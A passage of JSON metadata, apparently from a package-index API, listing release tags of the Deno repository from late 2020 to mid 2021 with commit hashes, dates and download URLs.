m/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00: